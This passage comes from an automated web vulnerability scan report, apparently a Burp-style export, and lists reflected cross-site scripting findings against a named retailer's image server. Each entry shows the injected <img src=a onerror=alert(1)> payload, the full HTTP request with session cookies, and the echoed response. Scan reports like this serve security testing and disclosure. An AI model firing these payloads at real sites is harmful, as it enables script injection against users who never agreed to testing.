Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 89
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:05 GMT
Connection: close

Unable to find /pacsunproducts/8913964_sw_054a4224<img src=a onerror=alert(1)>8c9adb198c2

3.252. http://images3.pacsun.com/is/image/pacsunproducts/8916876_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8916876_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 31850<img%20src%3da%20onerror%3dalert(1)>eae6ae15ce0 was submitted in the REST URL parameter 4. This input was echoed as 31850<img src=a onerror=alert(1)>eae6ae15ce0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8916876_0131850<img%20src%3da%20onerror%3dalert(1)>eae6ae15ce0?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:09:53 GMT
Connection: close

Unable to find /pacsunproducts/8916876_0131850<img src=a onerror=alert(1)>eae6ae15ce0

3.253. http://images3.pacsun.com/is/image/pacsunproducts/8917569_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8917569_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f8459<img%20src%3da%20onerror%3dalert(1)>90c27eff998 was submitted in the REST URL parameter 4. This input was echoed as f8459<img src=a onerror=alert(1)>90c27eff998 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8917569_01f8459<img%20src%3da%20onerror%3dalert(1)>90c27eff998?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:15 GMT
Connection: close

Unable to find /pacsunproducts/8917569_01f8459<img src=a onerror=alert(1)>90c27eff998

3.254. http://images3.pacsun.com/is/image/pacsunproducts/8928236_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8928236_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload cac81<img%20src%3da%20onerror%3dalert(1)>08938a5b728 was submitted in the REST URL parameter 4. This input was echoed as cac81<img src=a onerror=alert(1)>08938a5b728 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8928236_01cac81<img%20src%3da%20onerror%3dalert(1)>08938a5b728?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f":1317384569185}; mbox=session#1317384208243-106173#1317386430|PC#1317384208243-106173.19#1318594170|check#true#1317384630; fsr.a=1317384569558

Response

HTTP/1.1 403 Forbidden
Server: Apache-Coyote/1.1
Pragma: no-cache
Content-Type: text/plain
Content-Length: 85
Cache-Control: max-age=3600
Date: Fri, 30 Sep 2011 12:10:12 GMT
Connection: close

Unable to find /pacsunproducts/8928236_01cac81<img src=a onerror=alert(1)>08938a5b728

3.255. http://images3.pacsun.com/is/image/pacsunproducts/8930075_01 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://images3.pacsun.com
Path:   /is/image/pacsunproducts/8930075_01

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 37c75<img%20src%3da%20onerror%3dalert(1)>443dd332700 was submitted in the REST URL parameter 4. This input was echoed as 37c75<img src=a onerror=alert(1)>443dd332700 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /is/image/pacsunproducts/8930075_0137c75<img%20src%3da%20onerror%3dalert(1)>443dd332700?$11_product_list$ HTTP/1.1
Host: images3.pacsun.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search?ICID=0002649
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: stop_mobi=yes; PAC1=0; s_cc=true; s_vi=[CS]v1|2742D80B850110C3-4000010800279540[CE]; s_cm=1; c_m=undefinedwww.mcafeesecure.comwww.mcafeesecure.com; gpv_page=Homepage; s_sq=pacsuncom%3D%2526pid%253DHomepage%2526pidt%253D1%2526oid%253Dhttp%25253A//shop.pacsun.com/search/All-Products/refine/Sale/sale/control/show/200/index.search%25253FICID%25253D00026%2526ot%253DAREA; fsr.s={"v":1,"rid":"1317384220590_743121","ru":"http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp","r":"www.mcafeesecure.com","st":"","to":3,"c":"http://shop.pacsun.com/home.jsp","pv":1,"lc":{"d0":{"v":1,"s":false}},"cd":0,"sd":0,"f"